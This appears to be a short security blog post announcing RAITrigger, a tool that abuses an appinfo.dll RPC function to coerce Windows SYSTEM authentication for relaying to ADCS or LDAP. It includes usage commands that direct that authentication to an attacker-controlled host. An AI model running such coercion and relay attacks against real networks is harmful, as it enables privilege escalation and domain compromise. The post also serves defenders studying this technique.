RAITrigger: Local SYSTEM auth trigger for relaying

by ddos · November 26, 2025

RAITrigger

The RPC-function RAiForceElevationPromptForCOM from the appinfo.dll library allows SYSTEM coercion. This only works on domain joined systems. It turns out, that this function can be called from any low privileged user (not to spawn a process) but to trigger SYSTEM authentication to an arbitrary location. This is because CreateFileW is called as SYSTEM to the first input parameter’s location:

As the low privileged user is still impersonated, this cannot be used as Potato trigger to elevate Privileges from SEImpersonate to SYSTEM:

But it can be used to request a computer account certificate against ADCS when web enrollment is enabled with the incoming SMB authentication. Or it can be used for LPE with relaying to LDAP – when LDAP Signing is not enabled.

To Trigger SMB authentication:

[*] RAITrigger.exe \\attackerip\test\test.exe

To Trigger HTTP authentication (WebClient service needs to be enabled):

[*] RAITrigger.exe \\hostname@80\test\test.exe

HTTP authentication is only triggered to trusted intranet zone systems, so you will need to create an ADIDNS record for your Kali IP or be in the same subnet and use e.G. Responder. Never use the full FQDN, only the hostname.

Calling this function from remote (even with local administrator) leads to rpc_access_denied so this is no alternative to e.G. PetitPotam or similar:

Download

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal